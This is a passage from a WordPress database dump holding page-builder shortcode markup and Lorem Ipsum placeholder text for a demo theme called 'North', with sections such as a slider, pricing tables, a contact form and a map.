long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2014-06-23 09:20:53','2014-06-23 09:20:53','',623,'http://highperformingstudent.com/2014/06/23/623-revision-v1/',0,'revision','',0),(629,1,'2014-07-13 08:57:38','2014-07-13 08:57:38','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,546,547\" text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe26\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe26\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe26\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home3','','publish','open','open','','home3','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/north1/?page_id=623',0,'page','',0),(1918,1,'2014-07-13 08:57:38','2014-07-13 08:57:38','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,546,547\" text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%2